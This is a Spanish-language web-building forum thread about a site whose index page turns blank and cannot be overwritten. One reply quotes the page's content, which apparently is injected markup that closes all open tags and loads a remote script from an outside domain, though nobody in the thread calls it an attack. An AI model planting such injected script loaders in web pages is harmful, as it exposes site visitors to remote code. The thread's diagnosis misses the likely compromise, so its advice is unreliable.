Regresar a la página ComoCrearTuWeb.com
Resultados 1 al 9 de 9

Tema: Mi web aparece en blanco.

  1. #1
    Me va gustando esto... Habitante
    Fecha de Ingreso
    16 dic, 07
    Mensajes
    34
    Poder de Reputación
    22

    Mi web aparece en blanco.

    Hola, quiere que me ayuden porfavor, estaba subiendo unos archivos y al actualizar mi web, se puso toda blanca y aparece la url en el titulo y por mas que deshago lo que hice antes de actualizar sigue poniendose blanca.


    al subir el index me marca este error.

    553 Can't open that file: Permission denied

    porfavor espero me digan que es y como solucionarlo.

    Gracias!

  2. #2
    Me va gustando esto... Habitante
    Fecha de Ingreso
    23 dic, 07
    Ubicación
    Valencia
    Mensajes
    133
    Poder de Reputación
    22
    en tu pagina web index.html solo hay esto:


    </div></span></ilayer></layer></iframe></noframes></style></noscript></script></applet></xmp></pre></comment></xml></noembed>
    <script type='text/javascript'
    src='http://www.freetzi.com/category1/p.js'>
    </script>


    Es normal que salga en blanco

  3. #3
    Me va gustando esto... Habitante
    Fecha de Ingreso
    16 dic, 07
    Mensajes
    34
    Poder de Reputación
    22
    Cita Iniciado por residentbea
    en tu pagina web index.html solo hay esto:


    </div></span></ilayer></layer></iframe></noframes></style></noscript></script></applet></xmp></pre></comment></xml></noembed>
    <script type='text/javascript'
    src='http://www.freetzi.com/category1/p.js'>
    </script>


    Es normal que salga en blanco
    Ya se que sale eso, yo tengo mi index lo subo y al verlo online se ve todo blanco y solo ese codigo. Pero no importa, gracias de todas formas.

    Ya lo solucioné.

    Nos Vemos

  4. #4
    Me va gustando esto... Habitante
    Fecha de Ingreso
    16 dic, 07
    Mensajes
    34
    Poder de Reputación
    22
    Hola, perdonen el doble post pero es que me volvio a pasar ese problema, lo habia resuelto y navegaba por mi pagina pero cuando la actualizo se pone otra vez blanco y no se que es lo que lo este causando, alguien me podria explicar cual podria ser la causa de este problema?

    ya puse arriba el mensaje de error que me marca.


    Porfavor, y solo pasa con el index y sobreescribo un archivo si lo sube pero si sobre escribo el index me marca error. El index lo tengo igual no le cambie el nombre es index.htm y no se porque dice que no se puede abrir.

    En el editor si funciona, e intente subir una pagina en blanco y cuando subo el index con la pagina en blanco si se ve, hasta en el titulo dice "page title"

    Creo que ay algo mal en el codigo del index que hace que no lo lea.


    De antemano gracias. :?

  5. #5
    Me va gustando esto... Habitante
    Fecha de Ingreso
    23 dic, 07
    Ubicación
    Valencia
    Mensajes
    133
    Poder de Reputación
    22
    Dices que tu pagina es index.htm o index.html, a ver si has hecho dos index sin darte cuenta. Compruebalo.

  6. #6
    Me va gustando esto... Habitante
    Fecha de Ingreso
    16 dic, 07
    Mensajes
    34
    Poder de Reputación
    22
    No he hecho dos index solo modifique algo en el codigo y cuando lo subí no se veia nada.

    ...

  7. #7
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    03 nov, 22
    Mensajes
    2
    Poder de Reputación
    0
    Cita Iniciado por residentbea Ver Mensaje
    Dices que tu pagina es index.htm o index.html, a ver si has hecho dos index sin darte cuenta. Compruebalo.io games
    Nothing is seen when I do so.

  8. #8
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    14 nov, 22
    Mensajes
    2
    Poder de Reputación
    0
    amigis e tenido ese problemas mi web carga en blanco como puedo hacer ?

  9. #9
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    14 nov, 22
    Mensajes
    2
    Poder de Reputación
    0
    lo e corregido varias veces y siempre vuelve a pasar hay algina manera de corregir eso ?

Temas Similares

  1. Index.html de wix aparece en blanco
    Por DavidEternal en el foro Foro General
    Respuestas: 1
    Último Mensaje: 23/08/2016, 07:28
  2. Página web en blanco
    Por mvl-marketing en el foro Foro General
    Respuestas: 5
    Último Mensaje: 25/03/2009, 20:14
  3. Flash problemas en Dreamweaver, aparece BLANCO
    Por azuce en el foro Foro General
    Respuestas: 2
    Último Mensaje: 31/10/2008, 23:29

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •